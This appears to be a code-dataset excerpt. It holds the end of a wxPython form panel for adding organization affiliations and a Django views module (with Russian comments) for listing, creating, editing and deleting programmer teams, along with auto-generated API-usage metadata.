wx.TextCtrl(sbSizer221.GetStaticBox(), wx.ID_ANY,\n wx.EmptyString,\n wx.DefaultPosition, wx.Size(280,70), wx.TE_MULTILINE)\n newOrgSizer3.Add(self.textDesc, 0, wx.ALL, 5)\n \n sbSizer221.Add(newOrgSizer3, 0, wx.EXPAND, 5) #Denver\n \n newOrgSizer4 = wx.BoxSizer(wx.HORIZONTAL)\n\n lblLink = wx.StaticText( sbSizer221.GetStaticBox(), wx.ID_ANY, \n u\"Link:\", wx.DefaultPosition, wx.DefaultSize, 0)\n lblLink.Wrap(-1)\n newOrgSizer4.Add(lblLink, 0, wx.ALL, 5 )\n \n newOrgSizer4.AddSpacer((0,0), 1, wx.EXPAND, 5)\n \n self.textLink = wx.TextCtrl(sbSizer221.GetStaticBox(), wx.ID_ANY,\n wx.EmptyString,\n wx.DefaultPosition, wx.Size(280,-1), 0)\n newOrgSizer4.Add(self.textLink, 0, wx.ALL, 5)\n \n sbSizer221.Add(newOrgSizer4, 0, wx.EXPAND, 5) # Denver\n \n newOrgSizer5 = wx.BoxSizer(wx.HORIZONTAL)\n\n lblParent = wx.StaticText( sbSizer221.GetStaticBox(), wx.ID_ANY, \n u\"Parent Organization:\", wx.DefaultPosition, wx.DefaultSize, 0)\n lblParent.Wrap(-1)\n newOrgSizer5.Add(lblParent, 0, wx.ALL, 5 )\n \n newOrgSizer5.AddSpacer((0,0), 1, wx.EXPAND, 5)\n \n self.comboParent = wx.ComboBox(sbSizer221.GetStaticBox(), wx.ID_ANY, u\"Select Parent Organization\", wx.DefaultPosition, wx.DefaultSize, [], 0)\n self.comboParent.SetMinSize(wx.Size(280,-1))\n newOrgSizer5.Add(self.comboParent, 0, wx.ALL, 5)\n \n sbSizer221.Add(newOrgSizer5, 0, wx.EXPAND, 5)\n bSizer80.Add( sbSizer221, 0, wx.EXPAND, 5 )\n \n m_sdbSizer10 = wx.StdDialogButtonSizer()\n self.m_sdbSizer10OK = wx.Button( self, wx.ID_OK )\n m_sdbSizer10.AddButton( self.m_sdbSizer10OK )\n self.m_sdbSizer10Cancel = wx.Button( self, wx.ID_CANCEL )\n m_sdbSizer10.AddButton( self.m_sdbSizer10Cancel )\n m_sdbSizer10.Realize();\n \n bSizer80.Add( m_sdbSizer10, 1, wx.EXPAND, 5 )\n \n self.SetSizer( bSizer80 )\n self.Layout()\n \n\n\n\n\n def MakePaneContent(self, pane):\n \n nameLbl = wx.StaticText(pane, -1, \"Name:\")\n name = wx.TextCtrl(pane, -1, \"\");\n \n addrLbl = wx.StaticText(pane, -1, \"Address:\")\n addr1 = wx.TextCtrl(pane, -1, \"\");\n addr2 = wx.TextCtrl(pane, -1, \"\");\n \n cstLbl = wx.StaticText(pane, -1, \"City, State, Zip:\")\n city = wx.TextCtrl(pane, -1, \"\", size=(150,-1));\n state = wx.TextCtrl(pane, -1, \"\", size=(50,-1));\n zip = wx.TextCtrl(pane, -1, \"\", size=(70,-1));\n \n addrSizer = wx.FlexGridSizer(cols=2, hgap=5, vgap=5)\n addrSizer.AddGrowableCol(1)\n addrSizer.Add(nameLbl, 0, \n wx.ALIGN_RIGHT|wx.ALIGN_CENTER_VERTICAL)\n addrSizer.Add(name, 0, wx.EXPAND)\n addrSizer.Add(addrLbl, 0,\n wx.ALIGN_RIGHT|wx.ALIGN_CENTER_VERTICAL)\n addrSizer.Add(addr1, 0, wx.EXPAND)\n addrSizer.Add((5,5)) \n addrSizer.Add(addr2, 0, wx.EXPAND)\n \n addrSizer.Add(cstLbl, 0,\n wx.ALIGN_RIGHT|wx.ALIGN_CENTER_VERTICAL)\n \n cstSizer = wx.BoxSizer(wx.HORIZONTAL)\n cstSizer.Add(city, 1)\n cstSizer.Add(state, 0, wx.LEFT|wx.RIGHT, 5)\n cstSizer.Add(zip)\n addrSizer.Add(cstSizer, 0, wx.EXPAND)\n \n border = wx.BoxSizer()\n border.Add(addrSizer, 1, wx.EXPAND|wx.ALL, 5)\n pane.SetSizer(border)\n\n\n\n", "sub_path": "src/wizard/view/clsAddAffiliationPanel.py", "file_name": "clsAddAffiliationPanel.py", "file_ext": "py", "file_size_in_byte": 10530, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "wx.Panel", "line_number": 13, "usage_type": "attribute"}, {"api_name": "wx.Panel.__init__", "line_number": 15, "usage_type": "call"}, {"api_name": "wx.Panel", "line_number": 15, "usage_type": "attribute"}, {"api_name": "wx.ID_ANY", "line_number": 15, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 15, "usage_type": "attribute"}, {"api_name": "wx.Size", "line_number": 15, "usage_type": "call"}, {"api_name": "wx.TAB_TRAVERSAL", "line_number": 15, "usage_type": "attribute"}, {"api_name": "wx.Size", "line_number": 17, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 19, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 19, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 21, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 21, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 21, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 21, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 23, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 23, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 25, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 25, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 25, "usage_type": "attribute"}, {"api_name": "wx.DefaultSize", "line_number": 25, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 27, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 30, "usage_type": "attribute"}, {"api_name": "wx.ComboBox", "line_number": 33, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 33, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 33, "usage_type": "attribute"}, {"api_name": "wx.DefaultSize", "line_number": 33, "usage_type": "attribute"}, {"api_name": "wx.Size", "line_number": 34, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 36, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 39, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 41, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 41, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 42, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 42, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 44, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 44, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 45, "usage_type": "attribute"}, {"api_name": "wx.DefaultSize", "line_number": 45, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 46, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 48, "usage_type": "attribute"}, {"api_name": "wx.TextCtrl", "line_number": 50, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 50, "usage_type": "attribute"}, {"api_name": "wx.EmptyString", "line_number": 51, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 52, "usage_type": "attribute"}, {"api_name": "wx.Size", "line_number": 52, "usage_type": "call"}, {"api_name": "src.wizard.controller.frmRequiredValidator.RequiredValidator", "line_number": 52, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 53, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 55, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 55, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 56, "usage_type": "attribute"}, {"api_name": "wx.DefaultSize", "line_number": 56, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 57, "usage_type": "attribute"}, {"api_name": "wx.TextCtrl", "line_number": 59, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 59, "usage_type": "attribute"}, {"api_name": "wx.EmptyString", "line_number": 60, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 61, "usage_type": "attribute"}, {"api_name": "wx.Size", "line_number": 61, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 62, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 64, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 66, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 66, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 68, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 68, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 69, "usage_type": "attribute"}, {"api_name": "wx.DefaultSize", "line_number": 69, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 70, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 72, "usage_type": "attribute"}, {"api_name": "wx.TextCtrl", "line_number": 74, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 74, "usage_type": "attribute"}, {"api_name": "wx.EmptyString", "line_number": 75, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 76, "usage_type": "attribute"}, {"api_name": "wx.Size", "line_number": 76, "usage_type": "call"}, {"api_name": "src.wizard.controller.frmRequiredValidator.RequiredValidator", "line_number": 76, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 77, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 79, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 81, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 89, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 91, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 91, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 91, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 91, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 93, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 93, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 95, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 95, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 95, "usage_type": "attribute"}, {"api_name": "wx.DefaultSize", "line_number": 95, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 97, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 100, "usage_type": "attribute"}, {"api_name": "wx.ComboBox", "line_number": 103, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 103, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 103, "usage_type": "attribute"}, {"api_name": "wx.DefaultSize", "line_number": 103, "usage_type": "attribute"}, {"api_name": "wx.Size", "line_number": 104, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 106, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 109, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 111, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 111, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 113, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 113, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 114, "usage_type": "attribute"}, {"api_name": "wx.DefaultSize", "line_number": 114, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 116, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 118, "usage_type": "attribute"}, {"api_name": "wx.ComboBox", "line_number": 121, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 121, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 122, "usage_type": "attribute"}, {"api_name": "wx.DefaultSize", "line_number": 122, "usage_type": "attribute"}, {"api_name": "src.wizard.controller.frmRequiredComboValidator.RequiredComboValidator", "line_number": 123, "usage_type": "call"}, {"api_name": "wx.Size", "line_number": 124, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 126, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 127, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 129, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 129, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 131, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 131, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 132, "usage_type": "attribute"}, {"api_name": "wx.DefaultSize", "line_number": 132, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 134, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 135, "usage_type": "attribute"}, {"api_name": "wx.TextCtrl", "line_number": 137, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 137, "usage_type": "attribute"}, {"api_name": "wx.EmptyString", "line_number": 138, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 139, "usage_type": "attribute"}, {"api_name": "wx.Size", "line_number": 139, "usage_type": "call"}, {"api_name": "src.wizard.controller.frmRequiredValidator.RequiredValidator", "line_number": 139, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 140, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 143, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 145, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 145, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 147, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 147, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 148, "usage_type": "attribute"}, {"api_name": "wx.DefaultSize", "line_number": 148, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 150, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 152, "usage_type": "attribute"}, {"api_name": "wx.TextCtrl", "line_number": 154, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 154, "usage_type": "attribute"}, {"api_name": "wx.EmptyString", "line_number": 155, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 156, "usage_type": "attribute"}, {"api_name": "wx.Size", "line_number": 156, "usage_type": "call"}, {"api_name": "src.wizard.controller.frmRequiredValidator.RequiredValidator", "line_number": 156, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 157, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 159, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 161, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 161, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 163, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 163, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 164, "usage_type": "attribute"}, {"api_name": "wx.DefaultSize", "line_number": 164, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 166, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 168, "usage_type": "attribute"}, {"api_name": "wx.TextCtrl", "line_number": 170, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 170, "usage_type": "attribute"}, {"api_name": "wx.EmptyString", "line_number": 171, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 172, "usage_type": "attribute"}, {"api_name": "wx.Size", "line_number": 172, "usage_type": "call"}, {"api_name": "wx.TE_MULTILINE", "line_number": 172, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 173, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 175, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 177, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 177, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 179, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 179, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 180, "usage_type": "attribute"}, {"api_name": "wx.DefaultSize", "line_number": 180, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 182, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 184, "usage_type": "attribute"}, {"api_name": "wx.TextCtrl", "line_number": 186, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 186, "usage_type": "attribute"}, {"api_name": "wx.EmptyString", "line_number": 187, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 188, "usage_type": "attribute"}, {"api_name": "wx.Size", "line_number": 188, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 189, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 191, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 193, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 193, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 195, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 195, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 196, "usage_type": "attribute"}, {"api_name": "wx.DefaultSize", "line_number": 196, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 198, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 200, "usage_type": "attribute"}, {"api_name": "wx.ComboBox", "line_number": 202, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 202, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 202, "usage_type": "attribute"}, {"api_name": "wx.DefaultSize", "line_number": 202, "usage_type": "attribute"}, {"api_name": "wx.Size", "line_number": 203, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 204, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 206, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 207, "usage_type": "attribute"}, {"api_name": "wx.StdDialogButtonSizer", "line_number": 209, "usage_type": "call"}, {"api_name": "wx.Button", "line_number": 210, "usage_type": "call"}, {"api_name": "wx.ID_OK", "line_number": 210, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 212, "usage_type": "call"}, {"api_name": "wx.ID_CANCEL", "line_number": 212, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 216, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 227, "usage_type": "call"}, {"api_name": "wx.TextCtrl", "line_number": 228, "usage_type": "call"}, {"api_name": "wx.StaticText", "line_number": 230, "usage_type": "call"}, {"api_name": "wx.TextCtrl", "line_number": 231, "usage_type": "call"}, {"api_name": "wx.TextCtrl", "line_number": 232, "usage_type": "call"}, {"api_name": "wx.StaticText", "line_number": 234, "usage_type": "call"}, {"api_name": "wx.TextCtrl", "line_number": 235, "usage_type": "call"}, {"api_name": "wx.TextCtrl", "line_number": 236, "usage_type": "call"}, {"api_name": "wx.TextCtrl", "line_number": 237, "usage_type": "call"}, {"api_name": "wx.FlexGridSizer", "line_number": 239, "usage_type": "call"}, {"api_name": "wx.ALIGN_RIGHT", "line_number": 242, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER_VERTICAL", "line_number": 242, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 243, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_RIGHT", "line_number": 245, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER_VERTICAL", "line_number": 245, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 246, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 248, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_RIGHT", "line_number": 251, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER_VERTICAL", "line_number": 251, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 253, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 253, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 255, "usage_type": "attribute"}, {"api_name": "wx.RIGHT", "line_number": 255, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 257, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 259, "usage_type": "call"}, {"api_name": "wx.EXPAND", "line_number": 260, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 260, "usage_type": "attribute"}]} +{"seq_id": "548605758", "text": "# -*- coding: utf-8 -*-\nfrom crispy_forms.bootstrap import FormActions\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Fieldset, Div\nfrom crispy_forms.layout import Submit\nfrom django.core.urlresolvers import reverse, reverse_lazy\nfrom django.forms import ModelForm\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.views.generic import CreateView, UpdateView, DeleteView\n\nfrom myproject2016app.models.models import Programmer, Team\nfrom myproject2016app.util import paginate, get_current_group\n\n\n# Начальная Страницы Список Команд\ndef teams_list(request):\n\n current_team = get_current_group(request)\n\n if current_team:\n teams = Team.objects.filter(pk=current_team.id)\n else:\n teams = Team.objects.all()\n\n # teams = Team.objects.all()\n\n # try order for tems list\n ordered = request.GET.get('order_by', '')\n if ordered in ('name',):\n teams = teams.order_by(ordered)\n if request.GET.get('reverse', '') == '1':\n teams = teams.reverse()\n\n context = paginate(teams, 5, request, {}, var_name='teams')\n\n # # create pages whith pagonation\n # paginator = Paginator(teams, 4)\n # page = request.GET.get('page')\n # try:\n # teams = paginator.page(page)\n # except PageNotAnInteger:\n # # If page is not an integer, deliver first page.\n # teams = paginator.page(1)\n # except EmptyPage:\n # # If page is out of range (e.g. 9999), deliver last page of results.\n # teams = paginator.page(paginator.num_pages) # выводим последнюю страницу\n\n\n # teams_list = (\n # {'id': 1,\n # 'name': u'Феникс',\n # 'leader': {'id': 1, 'first_name': u'Юрий', 'last_name': u'Рынднин'},\n # },\n # {'id': 2,\n # 'name': u'Персей',\n # 'leader': {'id': 2, 'first_name': u'Виталий', 'last_name': u'Подоба'},\n # },\n # {'id': 3,\n # 'name': u'Локки',\n # 'leader': {'id': 3, 'first_name': u'Тараз', 'last_name': u'Шевченко'},\n # },\n # )\n programmers = Programmer.objects.all()\n\n return render(request, 'template_html/python_teams.html', context)\n\n\n# Шаблон Формы Создания Команды\n# через crispy_form\nclass TeamCreateForm(ModelForm):\n class Meta:\n # МетаДанные для Класса Модели определяются через Класс Мета // База данных // Выбор полей\n model = Team\n fields = Div('name', 'leader', 'notes')\n\n # логика при Инициализации Формы\n def __init__(self, *args, **kwargs):\n super(TeamCreateForm, self).__init__(*args, **kwargs)\n\n # Класс берется из Криспи_Формс\n self.helper = FormHelper(self)\n\n # Устанавливаем Свойства Тегов Формы -\n # прикручиваем к Классу Криспи_Формы\n self.helper.form_action = reverse_lazy('team_add', kwargs={})\n self.helper.form_method = 'POST'\n self.helper.form_class = 'form-horizontal'\n\n # Устанавливаем свойства Полей Формы\n self.helper.help_text_inline = True\n self.helper.html5_required = False\n self.helper.label_class = 'col-sm-3 control-label'\n self.helper.field_class = 'col-sm-6'\n\n self.helper.layout[:-1] = Fieldset('', 'name', 'leader', 'notes')\n self.helper.layout[-1] = FormActions(\n Submit('add_button', u'Добавить Команду в Базу', css_class=\"btn btn-primary\"),\n Submit('cancel_button', u'Отменить', css_class=\"btn btn-link\")\n )\n\n\n# Логика (Вьюшка) Формы Создания Команды\nclass TeamCreateView(CreateView):\n model = Team\n # fields = ['title', 'leader', 'notes']\n template_name = 'template_html/form_team.html'\n # success_url = '/groups/'\n form_class = TeamCreateForm\n\n def get_success_url(self):\n return u'%s?status_message = Команда Успешно Создана!' % reverse_lazy('teams')\n\n def post(self, request, *args, **kwargs):\n if request.POST.get('cancel_button'):\n return HttpResponseRedirect(u'%s?status_message=Создание Команды Отменено!'\n % (reverse('teams'))\n )\n # а всю важку роботу (валідація даних, збереження Группы, підготовка\n # помилок при некоректних даних) для нас зробить метод “post”\n # батьківського класу\n else:\n return super(TeamCreateView, self).post(request, *args, **kwargs)\n\n\n# def team_add(request):\n# return HttpResponse('

Its Add Team Page

')\n\n\n# Форма Редактирования Команды\nclass TeamUpdateForm(ModelForm):\n class Meta:\n model = Team\n fields = Div('name', 'leader', 'notes')\n\n def __init__(self, *args, **kwargs):\n super(TeamUpdateForm, self).__init__(*args, **kwargs)\n\n self.helper = FormHelper(self)\n\n self.helper.form_action = reverse('team_edit',\n kwargs={'pk': kwargs['instance'].id})\n self.helper.form_method = 'POST'\n self.helper.form_class = 'form-horizontal'\n\n self.helper.help_text_inline = True\n self.helper.html5_required = False\n self.helper.label_class = 'col-sm-3 control-label'\n self.helper.field_class = 'col-sm-6'\n\n self.helper.layout[:-1] = Fieldset('', 'name', 'leader', 'notes')\n self.helper.layout[-1] = FormActions(\n Submit('add_button', u'Сохранить Изменения', css_class='btn btn-primary'),\n Submit('cancel_button', u'Отменить', css_class='btn btn-link'),\n )\n\n\n# Логика Редактирования Программиста\nclass TeamUpdateView(UpdateView):\n model = Team\n template_name = 'template_html/team_edit.html'\n form_class = TeamUpdateForm\n # fields = '__all__'\n\n def get_success_url(self):\n return u'%s?status_message=Данные о Команде успешно Сохранены' % reverse('teams')\n\n def post(self, request, *args, **kwargs):\n if request.POST.get('cancel_button'):\n return HttpResponseRedirect(\n u'%s?status_message=Редактирование Данных о Команде Отменено' % reverse('teams') )\n else:\n return super(TeamUpdateView, self).post(request, *args, **kwargs)\n\n\n# Логика Удаления Команды\nclass TeamDeleteView(DeleteView):\n model = Team\n template_name = 'template_html/team_delete.html'\n\n def get_success_url(self):\n return u'%s?status_message=Команда успешно Удалена' % reverse('teams')\n# def team_edit(request, tid):\n# return HttpResponse('

Its Edit Team Page %s

' % tid)", "sub_path": "myproject2016app/views/pythonteams.py", "file_name": "pythonteams.py", "file_ext": "py", "file_size_in_byte": 7263, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "myproject2016app.util.get_current_group", "line_number": 19, "usage_type": "call"}, {"api_name": "myproject2016app.models.models.Team.objects.filter", "line_number": 22, "usage_type": "call"}, {"api_name": "myproject2016app.models.models.Team.objects", "line_number": 22, "usage_type": "attribute"}, {"api_name": "myproject2016app.models.models.Team", "line_number": 22, "usage_type": "name"}, {"api_name": "myproject2016app.models.models.Team.objects.all", "line_number": 24, "usage_type": "call"}, {"api_name": "myproject2016app.models.models.Team.objects", "line_number": 24, "usage_type": "attribute"}, {"api_name": "myproject2016app.models.models.Team", "line_number": 24, "usage_type": "name"}, {"api_name": "myproject2016app.util.paginate", "line_number": 35, "usage_type": "call"}, {"api_name": "myproject2016app.models.models.Programmer.objects.all", "line_number": 64, "usage_type": "call"}, {"api_name": "myproject2016app.models.models.Programmer.objects", "line_number": 64, "usage_type": "attribute"}, {"api_name": "myproject2016app.models.models.Programmer", "line_number": 64, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 66, "usage_type": "call"}, {"api_name": "django.forms.ModelForm", "line_number": 71, "usage_type": "name"}, {"api_name": "myproject2016app.models.models.Team", "line_number": 74, "usage_type": "name"}, {"api_name": "crispy_forms.layout.Div", "line_number": 75, "usage_type": "call"}, {"api_name": "crispy_forms.helper.FormHelper", "line_number": 82, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse_lazy", "line_number": 86, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Fieldset", "line_number": 96, "usage_type": "call"}, {"api_name": "crispy_forms.bootstrap.FormActions", "line_number": 97, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Submit", "line_number": 98, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Submit", "line_number": 99, "usage_type": "call"}, {"api_name": "django.views.generic.CreateView", "line_number": 104, "usage_type": "name"}, {"api_name": "myproject2016app.models.models.Team", "line_number": 105, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse_lazy", "line_number": 112, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 116, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 117, "usage_type": "call"}, {"api_name": "django.forms.ModelForm", "line_number": 131, "usage_type": "name"}, {"api_name": "myproject2016app.models.models.Team", "line_number": 133, "usage_type": "name"}, {"api_name": "crispy_forms.layout.Div", "line_number": 134, "usage_type": "call"}, {"api_name": "crispy_forms.helper.FormHelper", "line_number": 139, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 141, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Fieldset", "line_number": 151, "usage_type": "call"}, {"api_name": "crispy_forms.bootstrap.FormActions", "line_number": 152, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Submit", "line_number": 153, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Submit", "line_number": 154, "usage_type": "call"}, {"api_name": "django.views.generic.UpdateView", "line_number": 159, "usage_type": "name"}, {"api_name": "myproject2016app.models.models.Team", "line_number": 160, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 166, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 170, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 171, "usage_type": "call"}, {"api_name": "django.views.generic.DeleteView", "line_number": 177, "usage_type": "name"}, {"api_name": "myproject2016app.models.models.Team", 